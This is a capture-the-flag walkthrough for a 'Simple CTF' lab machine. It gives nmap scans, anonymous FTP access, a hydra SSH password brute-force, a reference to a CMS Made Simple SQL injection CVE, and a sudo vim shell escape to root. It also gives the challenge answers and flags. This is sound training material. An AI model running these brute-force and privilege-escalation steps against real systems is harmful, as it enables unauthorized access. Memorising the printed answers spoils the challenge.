Simple CTF
TARGET IP --> 10.10.120.214
Task 1: How many services are running under port 1000?
Utilize nmap for a quick scan.
nmap [Target IP]

It appears that two services are running. FTP and HTTP.
nmap -sV -sC [Target IP]

Looks like Anonymous login is allowed for FTP and SSH is running on port 2222.
Task 2: What is running on the higher port?
After running a script scan and version scan on nmap I found that Port 2222 is running SSH. Check the notes above.
Task 3: What's the CVE you're using against the application?
First tried out the web server on port 80. Looks like the default Apache web server page.

Checking out Wappalyzer shows apache web server on version 2.4.18 and Ubuntu as the OS.

Next I checked out the robots.txt page that was discovered during the nmap scan.

I found a directory named /openemr-5_0_1_3, and a possible user named mike.
The directory isn't there.
Decided to log into FTP service with anonymous account. Browsed around and found a file.
ftp [Target IP]

Use the get command to download the file.
get ForMitch.txt
Cat the file to view it.
cat ForMitch.txt

The system user password is really weak.
Let's do a hydra attack on the SSH server.
hydra -V -l mitch -P rockyou.txt ssh://[Target IP]:2222
It kicked back credentials for Mitch.
mitch:secret

Now let's log into SSH account with Mitch's credentials:
ssh -p 2222 mitch@[Target IP]

The answer to this one was actually gaining access to mitch's account through the web server instead of SSH. To do this you can find a login page to the webserver by using gobuster.
I actually had to look up another person's write-up to see how they did it.
This will take you to a login page using CMS Made Simple 2.2.8.
Googling vulnerabilities for this application shows that there is one on exploit DB.
This shows a CVE-2019-9053
You can use this POC to grab a salted/hashed password from the CMS. You can then use hashcat to crack the password for Mitch.

Task 4: To what kind of vulnerability is the application vulnerable?
Checking out the exploit DB for the CVE, shows this application is susceptible to SQL Injection or SQLI.
Task 5: What's the password?
Based on hydra attack from Task 3, Mitch's password is secret.
Task 6: Where can you log in with the details obtained?
We know we can log into SSH on port 2222 with the credentials.
Task 7: What's the user flag?
Let's cat the file on the home directory for mitch.
cat /home/mitch/user.txt
G00d j0b, keep up!

Task 8: Is there any other user in the home directory? What's its name?
Cd out of mitch's directory into the the /home directory and we will find another user called sunbath.
Task 9: What can you leverage to spawn a privileged shell?
Once logged in as mitch check what sudo privileges you have.
sudo -l

This shows that I have root privileges with VIM.
Next, I'll go to GTFOBins to find privilege escalation.

So let's try the command to gain root privileges.
sudo vim -c ':!/bin/sh'
And now you should have root privileges.
Task 10: What's the root flag?
Once you have root access, cat the root.txt file.
cat /root/root.txt
W3ll d0n3. You made it!
Last updated